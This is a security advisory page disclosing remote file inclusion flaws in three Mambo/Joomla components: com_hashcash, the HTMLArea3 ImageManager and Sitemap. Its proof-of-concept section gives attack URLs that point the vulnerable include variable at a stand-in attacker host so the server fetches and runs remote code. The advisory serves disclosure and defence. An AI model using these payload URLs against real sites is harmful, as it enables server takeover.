|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1249 CVE : CVE-2006-3751 CVE : CVE-2006-3750 CVE : CVE-2006-3749 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Ahmad Maulana a.k.a Matdhule Published : 24.07.2006
Advisory Content : ECHO_ADV_38$2006 --------------------------------------------------------------------------- -------------------- [ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities --------------------------------------------------------------------------- -------------------- Author : Ahmad Maulana a.k.a Matdhule Date : July 12th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Hashcash Component Application : com_hashcash Component version : 1.2.1 URL : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs .components.com_hashcash # HTMLArea3 addon - ImageManager Application : HTMLArea3 addon - ImageManager Version : 1.5 URL : # Sitemap 2.0.0 for Mambo 4.5.1 CMS Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS Version : Sitemap 2.0.0 URL : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip ------------------------------------------------------------------------ Vulnerability: ~~~~~~~~~~~~~~ # Hashcash Component In folder com_hashcash we found vulnerability script server.php. -----------------------server.php--------------------------------------- <?php include($mosConfig_absolute_path."/administrator/components/com_hashcash/co nfig.hashcash.php"); require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php'); ................... ------------------------------------------------------------------------ # HTMLArea3 addon - ImageManager In folder ImageManager we found vulnerability script config.inc.php. -----------------------config.inc.php----------------------------------- <?php // $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $ /** * HTMLArea3 addon - ImageManager * Based on Wei Zhuo's ImageManager * <img src="/imgs/at.gif" border=0 align=middle>package Mambo Open Source * <img src="/imgs/at.gif" border=0 align=middle>Copyright 2004 Bernhard Pfeifer aka novocaine * <img src="/imgs/at.gif" border=0 align=middle> All rights reserved * <img src="/imgs/at.gif" border=0 align=middle> Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html * <img src="/imgs/at.gif" border=0 align=middle>version $Revision: 1.5 $ **/ require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_x td-c/config.htmlarea3_xtd-c.php"); ------------------------------------------------------------------------ # Sitemap 2.0.0 for Mambo 4.5.1 CMS In folder com_sitemap we found vulnerability script sitemap.xml.php. -----------------------sitemap.xml.php---------------------- <?php /** * XML/XHTML menu system * <img src="/imgs/at.gif" border=0 align=middle>package Mambo_4.5.1 * <img src="/imgs/at.gif" border=0 align=middle>copyright (C) 2000 - 2004 Miro International Pty Ltd * <img src="/imgs/at.gif" border=0 align=middle>license http://www.gnu.org/copyleft/gpl.html GNU/GPL * Mambo is Free Software * Author : Johan Janssens - johan<img src="/imgs/at.gif" border=0 align=middle>jinx.be (http://www.jinx.be) **/ // XML library require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' ); ------------------------------------------------------------ Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Proof Of Concept: ~~~~~~~~~~~~~~~ http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolut e_path=http://attacker.com/evil.txt? http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/c onfig.inc.php?mosConfig_absolute_path=http://evilscript http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_abs olute_path=http://attacker.com/evil.txt? Solution: ~~~~~~~ sanitize variabel $mosConfig_absolute_path. ------------------------------------------------------------------------ --- Shoutz: ~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker<img src="/imgs/at.gif" border=0 align=middle>yahoogroups.com, jasakom_perjuangan<img src="/imgs/at.gif" border=0 align=middle>yahoogroups.com ~ #mardongan #jambihackerlink #e-c-h-o <img src="/imgs/at.gif" border=0 align=middle>irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |